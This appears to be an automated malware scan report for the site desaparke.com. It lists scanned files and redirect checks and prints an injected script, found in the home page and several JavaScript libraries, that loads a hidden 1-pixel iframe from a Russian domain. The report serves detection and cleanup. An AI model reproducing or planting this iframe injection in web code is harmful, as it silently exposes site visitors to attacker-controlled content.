Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=desaparke.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://desaparke.com/ | 200 OK Content-Length: 2275 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function () {
var bfn = document.createElement('iframe');
bfn.src = 'http://afxeftof.ru/count7.php';
bfn.style.position = 'absolute';
bfn.style.border = '0';
bfn.style.height = '1px';
bfn.style.width = '1px';
bfn.style.left = '1px';
bfn.style.top = '1px';
if (!document.getElementById('bfn')) {
document.write('<div id=\'bfn\'></div>');
document.getElementById('bfn').appendChild(bfn);
}
})(); Antivirus reports:
| ||
http://desaparke.com/fotogaleri.asp | 200 OK Content-Length: 8001 Content-Type: text/html | clean |
http://desaparke.com/JS/runflash.js | 200 OK Content-Length: 1570 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); } })(); Antivirus reports:
| ||
http://desaparke.com/JS/main.js | 200 OK Content-Length: 1796 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); } })(); Antivirus reports:
| ||
http://desaparke.com/js/prototype.js | 200 OK Content-Length: 50120 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); } })(); Antivirus reports:
| ||
http://desaparke.com/js/scriptaculous.js?load=effects | 200 OK Content-Length: 2929 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); } })(); Antivirus reports:
| ||
http://desaparke.com/js/lightbox.js | 200 OK Content-Length: 24226 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); } })(); Antivirus reports:
| ||
http://desaparke.com/js/TJK_ToggleDL.js | 200 OK Content-Length: 2875 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); } })(); Antivirus reports:
| ||
http://desaparke.com/js/dh.js | 200 OK Content-Length: 20884 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function () { var bfn = document.createElement('iframe'); bfn.src = 'http://afxeftof.ru/count7.php'; bfn.style.position = 'absolute'; bfn.style.border = '0'; bfn.style.height = '1px'; bfn.style.width = '1px'; bfn.style.left = '1px'; bfn.style.top = '1px'; if (!document.getElementById('bfn')) { document.write('<div id=\'bfn\'></div>'); document.getElementById('bfn').appendChild(bfn); } })(); Antivirus reports:
| ||
http://desaparke.com/resimler/files/60.jpg | 200 OK Content-Length: 35073 Content-Type: image/jpeg | clean |
http://desaparke.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://desaparke.com/resimler/files/59.jpg | 200 OK Content-Length: 34840 Content-Type: image/jpeg | clean |
http://desaparke.com/resimler/files/58.jpg | 200 OK Content-Length: 34026 Content-Type: image/jpeg | clean |
http://desaparke.com/resimler/files/57.jpg | 200 OK Content-Length: 47601 Content-Type: image/jpeg | clean |
http://desaparke.com/resimler/files/56.jpg | 200 OK Content-Length: 40258 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: desaparke.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 01 Sep 2014 22:51:18 GMT
Server: Microsoft-IIS/6.0
Content-Length: 2275
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQCAQAR=GEPDDMHCCDEOICCKHBPANAKL; path=/
X-Powered-By: ASP.NET
...2275 bytes of data.
GET / HTTP/1.1
Host: desaparke.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 01 Sep 2014 22:51:18 GMT
Server: Microsoft-IIS/6.0
Content-Length: 2275
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQCAQAR=GEPDDMHCCDEOICCKHBPANAKL; path=/
X-Powered-By: ASP.NET
...2275 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: desaparke.com
Referer: http://www.google.com/search?q=desaparke.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: desaparke.com
Referer: http://www.google.com/search?q=desaparke.com
Result:
The result is similar to the first query. There are no suspicious redirects found.